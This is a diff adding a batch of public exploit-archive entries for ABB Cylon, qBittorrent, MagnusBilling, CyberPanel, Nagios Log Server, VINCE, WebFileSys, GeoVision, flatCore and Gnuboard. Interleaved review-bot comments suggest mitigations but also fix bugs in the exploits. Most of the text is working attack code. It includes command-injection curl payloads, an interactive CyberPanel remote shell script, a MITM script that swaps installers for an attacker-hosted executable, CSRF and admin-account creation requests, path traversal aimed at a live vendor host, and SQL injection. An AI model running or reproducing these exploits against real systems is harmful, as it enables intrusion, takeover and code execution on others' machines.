+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5912 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5912.php +CVE ID: CVE-2024-48841 +CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48841 + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. 
|' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ curl -k -X PUT "https://7.3.3.1/api/users/password" \ +> -H "Cookie: user_sid=xxx" \ +> -H "Content-Type: application/json" \ +> --data '{"oldPassword":"KAKA","newPassword":"ZULU`sleep 7`"}' \ No newline at end of file diff --git a/exploits/multiple/hardware/52188.txt b/exploits/multiple/hardware/52188.txt new file mode 100644 index 000000000..a7a5de823 --- /dev/null +++ b/exploits/multiple/hardware/52188.txt 
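Review bot: The entry has no fixed-version or vendor-patch reference, only `Firmware: <=9.3.4`, so readers cannot tell whether a later release addresses `/api/users/password`. The stated root cause — the new password is hand-escaped before `ChildProcess.exec()` assembles a `usermod` line — points at the fix: never place a password on a command line; use `execFile` with an argument array, or feed `chpasswd` over stdin, which also keeps the secret out of the process table and the journal. The backtick in the curl example indicates the escaping does not cover command substitution; on the detection side, the node service spawning `usermod` with unexpected arguments is the alert condition.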
@@ -0,0 +1,92 @@ +# Exploit Title: ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated) +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) + CBX Series (FLX Series) + CBT Series + CBV Series + Firmware: <=9.3.4 + +Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a +series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ +building management solutions. ABB BACnet controllers are designed for intelligent +control of HVAC equipment such as central plant, boilers, chillers, cooling towers, +heat pump systems, air handling units (constant volume, variable air volume, and +multi-zone), rooftop units, electrical systems such as lighting control, variable +frequency drives and metering. + +The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented +connectivity and open integration for your building automation systems. It's scalable, +and modular, allowing you to control a diverse range of HVAC functions. + +Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to authenticated remote root +code execution via the /api/timeConfig endpoint. An attacker with valid credentials +can inject arbitrary system commands by manipulating parameters such as tz, timeServerYN, +and multiple timeDate fields. The vulnerability exists due to improper input validation +in timeConfig.js, where user-supplied data is executed via ChildProcess.exec() without +adequate sanitization. + +Tested on: Linux Kernel 5.4.27 + Linux Kernel 4.15.13 + NodeJS/8.4.0 + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5910 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5910.php +CVE ID: CVE-2024-48841 +CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48841 + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. 
|' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ curl -k -X PUT "https://7.3.3.1/api/timeConfig" \ +> -H "Cookie: user_sid=xxx" \ +> -H "Content-Type: application/json" \ +> -d '{"timeConfig":{"timeDate":{\ +> "yy":"`sleep 17`",\ +> "mm":"`sleep 17`",\ +> "dd":"`sleep 17`",\ +> "h":"`sleep 17`",\ +> "m":"`sleep 17`",\ +> "s":"`sleep 17`"},\ +> "tz":"`sleep 17`",\ +> "tzList":[],\ +> "timeServerYN":"`sleep 17`",\ +> "timeServer":"1.1.1.1",\ +> "timeServerSync":false}}' \ No newline at end of file diff --git a/exploits/multiple/local/52190.py b/exploits/multiple/local/52190.py new file mode 100755 index 000000000..0a5bbbd7a --- /dev/null +++ b/exploits/multiple/local/52190.py 
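Review bot: The header cites `CVE ID: CVE-2024-48841`, the same identifier as the `/api/users/password` entry (52186) in this commit, while the advisory ids differ (`ZSL-2025-5910` here, `ZSL-2025-5912` there); one of the two CVE lines is likely a copy-paste slip and should be checked against the advisory URL. As with the other FLXeon RCE entry, the fix is to stop building the `timeConfig.js` shell command from request fields: validate `yy`/`mm`/`dd`/`h`/`m`/`s` as integers, `tz` against the server's own `tzList`, and `timeServerYN` as a boolean, then invoke the underlying tools through `execFile` with an argument array. A shell spawned from the time-configuration handler with non-numeric arguments is the detection signal.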
@@ -0,0 +1,40 @@
+# Exploit Title: qBittorrent 5.0.1 MITM RCE
+# Date: 01/02/2025
+# Exploit Author: Jordan Sharp
+# Vendor Homepage: https://github.com/qbittorrent/qBittorrent
+# Software Link: https://www.qbittorrent.org/download
+# Version: < 5.0.1
+# Tested on: Windows 10
+# CVE : CVE-2024-51774
+
+Run the PoC on a MITM machine intercepting the host
+
+"""PoC exploit for CVE-2024-51774"""
+from mitmproxy import http
+
+targets = [
+ "https://www.python.org/ftp/python/3.10.11/python-3.10.11-amd64.exe",
+ "https://www.python.org/ftp/python/3.8.10/python-3.8.10-amd64.exe",
+ "https://www.python.org/ftp/python/3.10.11/python-3.10.11.exe",
+ "https://www.python.org/ftp/python/3.8.10/python-3.8.10.exe",
+ "https://www.python.org/ftp/python/3.4.3/python-3.4.3.msi",
+ "https://www.python.org/ftp/python/3.8.5/python-3.8.5-amd64.exe",
+ "https://www.python.org/ftp/python/3.8.5/python-3.8.5.exe",
+ "https://www.python.org/ftp/python/3.8.1/python-3.8.1-amd64.exe",
+ "https://www.python.org/ftp/python/3.8.1/python-3.8.1.exe",
+ "https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe",
+ "https://www.python.org/ftp/python/3.7.4/python-3.7.4.exe",
+ "https://www.python.org/ftp/python/3.6.6/python-3.6.6.exe",
+ "https://www.python.org/ftp/python/3.12.4/python-3.12.4-amd64.exe",
+ "https://www.python.org/ftp/python/3.4.4/python-3.4.4.msi",
+ "https://www.python.org/ftp/python/3.5.2/python-3.5.2.exe"
+]
+
+SUBSTITUTE_URL = "http://192.168.50.2:6666/calc.exe"
+
+def request(flow: http.HTTPFlow) -> None:
+ """
+ Inject any exe instead of a Python installer.
+ """
+ if flow.request.pretty_url in targets:
+ flow.request.url = SUBSTITUTE_URL
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52170.txt b/exploits/multiple/webapps/52170.txt
new file mode 100644
index 000000000..8e5b5f8c7
--- /dev/null
+++ b/exploits/multiple/webapps/52170.txt
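Review bot: The line `Run the PoC on a MITM machine intercepting the host` sits at module level as bare text, so the file is a `SyntaxError` and mitmproxy will refuse to load it; it should be a comment, `# Run the PoC on a MITM machine intercepting the host`. The header is also inconsistent with itself: the title says `qBittorrent 5.0.1` while `# Version: < 5.0.1`, and the latter is the one that matches CVE-2024-51774, which was fixed in 5.0.1. The script only works because the affected client fetched these installers over a connection whose certificate it did not validate (not stated here, but implied by the MITM setup); the defensive takeaway is to validate TLS on downloads and verify installer hashes or signatures before executing anything fetched on the user's behalf.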
@@ -0,0 +1,15 @@
+# Exploit Title: [MagnusBilling 6.x and 7.x Unauthenticated Remote Command Injection Vulnerability]
+# Date: [2024-10-26]
+# Exploit Author: [CodeSecLab]
+# Vendor Homepage: [https://github.com/magnussolution/magnusbilling7]
+# Software Link: [https://github.com/magnussolution/magnusbilling7]
+# Version: [7.3.0]
+# Tested on: [Centos]
+# CVE : [CVE-2023-30258]
+
+PoC:
+# PoC URL for Command Injection
+http://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt
+Result: This PoC attempts to inject the id command.
+
+[Replace Your Domain Name]
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52172.py b/exploits/multiple/webapps/52172.py
new file mode 100755
index 000000000..fd0c1d753
--- /dev/null
+++ b/exploits/multiple/webapps/52172.py
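Review bot: Every header field is still wrapped in the submission template's square brackets (`# Date: [2024-10-26]`, `# CVE : [CVE-2023-30258]`, …) and the closing `[Replace Your Domain Name]` is a placeholder rather than content; the brackets should be removed so the fields parse like the rest of the archive. The entry does not say which releases are fixed or what `icepay.php` does with `democ`, so the claimed range `6.x and 7.x` cannot be reconciled with `Version: [7.3.0]`. For mitigation, `democ` should be validated against an allowlist before it can reach any shell, and web-server logs showing `;` or other shell metacharacters in that parameter are the obvious detection.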
@@ -0,0 +1,74 @@
+# Exploit Title: CyberPanel v2.3.5, v2.3.6 - Remote Code Execution (RCE) (Unauthenticated)
+# Date: 10/29/2024
+# Exploit Author: Luka Petrovic (refr4g)
+# Vendor Homepage: https://cyberpanel.net/
+# Software Link: https://github.com/usmannasir/cyberpanel
+# Version: 2.3.5, 2.3.6, 2.3.7 (before patch)
+# Tested on: Ubuntu 20.04, CyberPanel v2.3.5, v2.3.6, v2.3.7 (before patch)
+# CVE: CVE-2024-51378
+# PoC Repository: https://github.com/refr4g/CVE-2024-51378
+# Blog Post: https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/
+
+#!/usr/bin/python3
+
+import argparse
+import httpx
+import sys
+
+RED = "\033[91m"
+GREEN = "\033[92m"
+CYAN = "\033[96m"
+MAGENTA = "\033[95m"
+YELLOW = "\033[93m"
+RESET = "\033[0m"
+
+print(f"{RED}CVE-2024-51378{RESET} - Remote Code Execution Exploit")
+print(f"{CYAN}Author:{RESET} {GREEN}Luka Petrovic (refr4g){RESET}")
+print()
+
+allowed_endpoints = ["/ftp/getresetstatus", "/dns/getresetstatus"]
+
+parser = argparse.ArgumentParser()
+parser.add_argument("target", help=f"{CYAN}Target URL (with http/https prefix){RESET}")
+parser.add_argument("endpoint", help=f"{CYAN}Endpoint to target, choose from {allowed_endpoints}{RESET}")
+args = parser.parse_args()
+
+if args.endpoint not in allowed_endpoints:
+ print(f"{RED}Error: Invalid endpoint '{args.endpoint}'.{RESET}")
+ parser.print_help()
+ sys.exit(1)
+
+target = args.target
+endpoint = args.endpoint
+
+client = httpx.Client(base_url=target, verify=False)
+
+try:
+ response = client.get("/")
+ response.raise_for_status()
+except httpx.RequestError:
+ print(f"{RED}Error: Unable to reach the target {target}. 
Please check the URL and your connection.{RESET}")
+ sys.exit(1)
+
+def get_token():
+ response = client.get("/")
+ return response.cookies.get("csrftoken")
+
+def rce(client, csrf_token, cmd, endpoint):
+ headers = {
+ "X-CSRFToken": csrf_token,
+ "Content-Type": "application/json",
+ "Referer": str(client.base_url)
+ }
+ payload = '{"statusfile": "; %s; #"}' % cmd
+ response = client.request("OPTIONS", endpoint, headers=headers, data=payload)
+ return response.json().get("requestStatus")
+
+csrf_token = get_token()
+if not csrf_token:
+ print(f"{RED}Failed to retrieve CSRF token. Exiting.{RESET}")
+ sys.exit(1)
+
+while True:
+ cmd = input(f"{YELLOW}$> {RESET}")
+ print(rce(client, csrf_token, cmd, endpoint))
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52177.md b/exploits/multiple/webapps/52177.md
new file mode 100644
index 000000000..137846e61
--- /dev/null
+++ b/exploits/multiple/webapps/52177.md
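Review bot: `payload = '{"statusfile": "; %s; #"}' % cmd` in `rce()` splices the operator's command into a JSON string by `%` formatting, so any command containing a double quote or backslash (e.g. `echo "x"`) yields invalid JSON and the request dies before the injection point; build it with `payload = json.dumps({"statusfile": f"; {cmd}; #"})` and add `import json`. The reachability check catches only `httpx.RequestError`, but `response.raise_for_status()` raises `httpx.HTTPStatusError`, which is a sibling class rather than a subclass, so a 4xx/5xx on `/` produces a traceback instead of the friendly message — widen it to `except (httpx.RequestError, httpx.HTTPStatusError):`. `response.json()` in `rce()` will likewise raise on a non-JSON reply (e.g. an HTML error page), which is worth guarding with a `try` around the decode. Finally, `#!/usr/bin/python3` sits on line 12 after the comment header and is therefore inert; move it to line 1 if the `100755` mode is meant to make the script directly executable.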
@@ -0,0 +1,41 @@
+# Exploit Title: Nagios Log Server 2024R1.3.1 - API Key Exposure
+# Date: 2025-04-08
+# Exploit Author: Seth Kraft, Alex Tisdale
+# Vendor Homepage: https://www.nagios.com/
+# Vendor Changelog: https://www.nagios.com/changelog/#log-server
+# Software Link: https://www.nagios.com/products/log-server/download/
+# Version: Nagios Log Server 2024R1.3.1 and below
+# Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04)
+# CWE: CWE-200, CWE-284, CWE-522
+# CVSS: 9.8 (CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
+# Type: Information Disclosure, Improper Access Control
+# Exploit Risk: Critical
+
+## Disclosure
+For ethical research purposes only. Do not target systems without proper authorization.
+
+## Description
+An API-level vulnerability in Nagios Log Server 2024R1.3.1 allows any user with a valid API token to retrieve a full list of user accounts along with their plaintext API keys, including administrator credentials. This flaw enables user enumeration, privilege escalation, and full system compromise via unauthorized use of exposed tokens.
+
+## PoC
+
+### Step 1: Access the vulnerable endpoint
+
+```
+curl -X GET "http:///nagioslogserver/index.php/api/system/get_users?token="
+```
+
+## Sample Response
+
+```json
+[
+ {
+ "name": "devadmin",
+ "username": "devadmin",
+ "email": "test@example.com",
+ "apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
+ "auth_type": "admin",
+ ...
+ }
+]
+```
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52181.txt b/exploits/multiple/webapps/52181.txt
new file mode 100644
index 000000000..2b0eae8ff
--- /dev/null
+++ b/exploits/multiple/webapps/52181.txt
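Review bot: The line `# CVSS: 9.8 (CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)` is internally inconsistent: `S:C` is a CVSS 3.x scope metric that does not exist in the 4.0 vector format, and read as a 3.1 vector it scores 9.9 (8.8 with `S:U`), while 9.8 corresponds to `PR:N` — yet the description itself says a valid API token is required, i.e. `PR:L`. Pick one version and make the score match, e.g. `# CVSS: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)` or a genuine 4.0 vector. The PoC line `curl -X GET "http:///nagioslogserver/index.php/api/system/get_users?token="` has lost its host and token placeholders (probably angle-bracketed text eaten on the way in); restore them as `http://TARGET/nagioslogserver/index.php/api/system/get_users?token=LOW_PRIV_API_KEY` so it is clear that a low-privilege key is sufficient.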
@@ -0,0 +1,37 @@ +# Exploit Tile: CMU CERT/CC VINCE 2.0.6 - Stored XSS +# Vendor: Carnegie Mellon University +# Product web page: https://www.kb.cert.org/vince/ +# Affected version: <=2.0.6 + +Summary: VINCE is the Vulnerability Information and Coordination +Environment developed and used by the CERT Coordination Center +to improve coordinated vulnerability disclosure. VINCE is a +Python-based web platform. + +Desc: The framework suffers from an authenticated stored +cross-site scripting vulnerability. Input passed to the +'content' POST parameter is not properly sanitised before +being returned to the user. This can be exploited to execute +arbitrary HTML/JS code in a user's browser session in context +of an affected site. + +Tested on: nginx/1.20.0 + Django 3.2.17 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5917 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5917.php + + +13.01.2023 + +-- + + +$ curl -k https://kb.cert.org/vince/comm/post/CASE_NO \ +> -H "Cookie: sessionid=xxxx" \ +> -d 'content=">ZSL%0A%0A&csrfmiddlewaretoken=xxx&paginate_by=10&reply_to=xxxxx' \ No newline at end of file diff --git a/exploits/multiple/webapps/52185.txt b/exploits/multiple/webapps/52185.txt new file mode 100644 index 000000000..ac7130a35 --- /dev/null +++ b/exploits/multiple/webapps/52185.txt 
@@ -0,0 +1,24 @@
+# Exploit Title: WebFileSys 2.31.0 - Directory Path Traversal in relPath Parameter
+# Date: Nov 25, 2024
+# Exploit Author: Korn Chaisuwan, Charanin Thongudom, Pongtorn Angsuchotmetee
+# Vendor Homepage: http://www.webfilesys.de/webfilesys-home/index.html
+# Software Link: http://www.webfilesys.de/webfilesys-home/download.html
+# Version: 2.31.0
+# Tested on: macOS
+# CVE : CVE-2024-53586
+
+GET /webfilesys/servlet?command=mobile&cmd=folderFileList&initial=true&relPath=/../../.. HTTP/1.1
+Host: www.webfilesys.de
+Cookie: JSESSIONID=BE9434E13C7CDE33D00D6F484F64EFB8
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: https://www.webfilesys.de/webfilesys/servlet?command=menuBar
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Priority: u=0, i
+Te: trailers
+Connection: keep-alive
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52187.txt b/exploits/multiple/webapps/52187.txt
new file mode 100644
index 000000000..b5714f388
--- /dev/null
+++ b/exploits/multiple/webapps/52187.txt
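Review bot: The PoC request is addressed to the vendor's live site (`Host: www.webfilesys.de`, `Referer: https://www.webfilesys.de/...`) and ships a concrete `JSESSIONID`; a published exploit should use placeholders such as `Host: <target>` and `Cookie: JSESSIONID=<session>` so readers do not replay traversal requests against the vendor's production server. The session cookie suggests the traversal needs an authenticated session, which the header and title do not say — add `(Authenticated)` to the title if that is the case. `# Tested on: macOS` describes the client browser, not the servlet container the vulnerable application was running in, which is the more useful fact here.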
@@ -0,0 +1,58 @@ +# Exploit Title: GeoVision GV-ASManager 6.1.1.0 - CSRF +# Google Dork: inurl:"ASWeb/Login" +# Date: 02-FEB-2025 +# Exploit Author: Giorgi Dograshvili [DRAGOWN] +# Vendor Homepage: https://www.geovision.com.tw/ +# Software Link: https://www.geovision.com.tw/download/product/ +# Version: 6.1.1.0 or less +# Tested on: Windows 10 | Kali Linux +# CVE : CVE-2024-56901 +# PoC: https://github.com/DRAGOWN/CVE-2024-56901 + +A Cross-Site Request Forgery (CSRF) vulnerability in Geovision GV-ASManager web application with the version 6.1.1.0 or less that allows attackers to arbitrarily create Admin accounts via a crafted GET request method. This vulnerability is used in chain with CVE-2024-56903 for a successful CSRF attack. + +Requirements +To perform successful attack an attacker requires: +- GeoVision ASManager version 6.1.1.0 or less +- Network access to the GV-ASManager web application (there are cases when there are public access) +- Administrator's interaction with an open session in the browser + +Impact +The vulnerability can be leveraged to perform the following unauthorized actions: +A unauthorized account is able to: +- Modify POST method request with GET by leveraging CVE-2024-56903 vulnerability. +- Craft a malicious HTML page which makes changes in the application on behalf of the administrator account. +- Create a new administrator account on behalf of the legit administrator account. +After the successful attack, an attacker will be able to: +- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc. +- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc. +- Disrupt and disconnect services such as monitoring cameras, access controls. +- Clone and duplicate access control data for further attack scenarios. 
+- Perform CVE-2024-56902 attack to retrieve cleartext password that can be reused in other digital assets of the organization. + + +The CSRF code: + + + +
# Set the target + + # Set Username + # Set Password + # Set Email + # Set privilege 1-Normal user 2-Administrator + +
+ + + + + +After a successful attack, you will get access to: +- ASWeb - Access & Security Management +- TAWeb - Time and Attendance Management +- VMWeb - Visitor Management +- ASManager - Access & Security Management software in OS \ No newline at end of file diff --git a/exploits/multiple/webapps/52189.txt b/exploits/multiple/webapps/52189.txt new file mode 100644 index 000000000..10c997672 --- /dev/null +++ b/exploits/multiple/webapps/52189.txt 
@@ -0,0 +1,47 @@ +# Exploit Title: Broken Access Control in GeoVision GV-ASManager +# Google Dork: inurl:"ASWeb/Login" +# Date: 02-FEB-2025 +# Exploit Author: Giorgi Dograshvili [DRAGOWN] +# Vendor Homepage: https://www.geovision.com.tw/ +# Software Link: https://www.geovision.com.tw/download/product/ +# Version: 6.1.0.0 or less +# Tested on: Windows 10 | Kali Linux +# CVE : CVE-2024-56898 +# PoC: https://github.com/DRAGOWN/CVE-2024-56898 + + +Broken access control vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less. + +Requirements +To perform successful attack an attacker requires: +- GeoVision ASManager version 6.1.0.0 or less +- Network access to the GV-ASManager web application (there are cases when there are public access) +- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: ) + +Impact +The vulnerability can be leveraged to perform the following unauthorized actions: +A low privilege account which isn't authorized to manage accounts is able to: +- Enable and disable any account. +- Create new accounts. +- Modify privileges of any account. +- Listing accounts and their information. +After the escalation of the privileges, an attacker will be able to: +- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc. +- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc. +- Disrupt and disconnect services such as monitoring cameras, access controls. +- Clone and duplicate access control data for further attack scenarios. +- Perform CVE-2024-56902 attack to retrieve cleartext password that can be reused in other digital assets of the organization. 
+ +cURL script: + +curl --path-as-is -i -s -k -X $'POST' \ + -H $'Host: [SET-TARGET]' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'Accept-Language: en-US,en;q=0.9' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Sec-Fetch-Site: cross-site' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Dest: document' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=0, i' -H $'Connection: keep-alive' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 111' \ + -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \ + --data-binary $'action=UA_SetCreateAccount&id=[SET-USERNAME]&password=[SET-PASSWORD]&email=[SET-MAIL]&level=[SET-PRIVILEGE 1-STANDARD USER/2-ADMINISTRATOR]' \ + $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf' + +After a successful attack, you will get access to: +- ASWeb - Access & Security Management +- TAWeb - Time and Attendance Management +- VMWeb - Visitor Management +- ASManager - Access & Security Management software in OS \ No newline at end of file diff --git a/exploits/php/webapps/52166.txt b/exploits/php/webapps/52166.txt new file mode 100644 index 000000000..e3b4eb996 --- /dev/null +++ b/exploits/php/webapps/52166.txt @@ -0,0 +1,30 @@ +# Exploit Title: [ flatCore < 1.5 CSRF Vulnerability for Arbitrary .php File Upload via files.upload-script.php] +# Date: [2024-10-26] +# Exploit Author: [CodeSecLab] +# Vendor Homepage: [https://github.com/flatCore/flatCore-CMS] +# Software Link: [https://github.com/flatCore/flatCore-CMS] +# Version: [d3a5168] +# Tested on: [Ubuntu Windows] +# CVE : [CVE-2019-13961] + +PoC: + + + + CSRF PoC + + +
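Review bot: The curl command pins `-H $'Content-Length: 111'` while the `--data-binary` body still contains `[SET-USERNAME]`, `[SET-PASSWORD]`, `[SET-MAIL]` and `[SET-PRIVILEGE ...]` placeholders, so after substitution the declared length is wrong and the server may truncate or reject the body; curl computes Content-Length itself, so that header should simply be removed. The target `$'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'` has no scheme and the `Host:` header duplicates it — give the URL as `http://[SET-TARGET]/ASWeb/bin/ASWebCommon.srf` and drop the manual `Host`. The `Sec-Fetch-Site: cross-site` header copied from a browser is also misleading for a direct request; only the cookie and the form body are material to the access-control bypass.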
+ + + + + + + +
+ + + + +[Replace Your Domain Name] \ No newline at end of file diff --git a/exploits/php/webapps/52167.txt b/exploits/php/webapps/52167.txt new file mode 100644 index 000000000..c105fa0e0 --- /dev/null +++ b/exploits/php/webapps/52167.txt @@ -0,0 +1,27 @@ +# Exploit Title: [Gnuboard5 <= 5.3.2.8 SQL Injection via table_prefix Parameter] +# Date: [2024-10-26] +# Exploit Author: [CodeSecLab] +# Vendor Homepage: [https://github.com/gnuboard/gnuboard5] +# Software Link: [https://github.com/gnuboard/gnuboard5] +# Version: [5.3.2.8] +# Tested on: [Ubuntu Windows] +# CVE : [CVE-2020-18662] + +PoC: +1) +POST /install/install_db.php HTTP/1.1 +Host: gnuboard +Content-Type: application/x-www-form-urlencoded +Content-Length: 100 + +mysql_user=root&mysql_pass=password&mysql_db=gnuboard&table_prefix=12`; select sleep(5)# +result: sleep 5s. +2) +curl -X POST http://gnuboard/install/install_db.php \ + -d "mysql_user=root" \ + -d "mysql_pass=password" \ + -d "mysql_db=gnuboard_db" \ + -d "table_prefix=' OR 1=1--" +result: The application does not work. + +[Replace Your Domain Name and Replace Database Information] \ No newline at end of file diff --git a/exploits/php/webapps/52168.txt b/exploits/php/webapps/52168.txt new file mode 100644 index 000000000..42d2f8b87 --- /dev/null +++ b/exploits/php/webapps/52168.txt 
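Review bot: In Gnuboard PoC 1 the raw request declares `Content-Length: 100`, but the body `mysql_user=root&mysql_pass=password&mysql_db=gnuboard&table_prefix=12`; select sleep(5)#` is about 88 bytes and its backtick, `;` and spaces are unencoded, so replaying it verbatim hangs or is rejected; drop the explicit Content-Length and encode the prefix as `table_prefix=12%60%3B%20select%20sleep(5)%23`. PoC 2's outcome `The application does not work` is an error, not evidence of injection — pair it with a true/false variant (`' OR 1=1--` vs `' OR 1=2--`) and state the observable difference. The title's `<= 5.3.2.8` also relies on the installer being reachable post-install; the entry should say whether `/install/install_db.php` is normally present on a deployed site.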
